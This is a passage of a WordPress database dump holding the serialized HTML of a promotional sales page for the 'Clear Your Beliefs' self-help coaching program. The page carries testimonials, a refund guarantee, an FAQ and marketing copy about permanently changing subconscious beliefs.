developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1889, 2164, 'panels_data', 'a:3:{s:7:"widgets";a:3:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:825:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:63409:"\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a 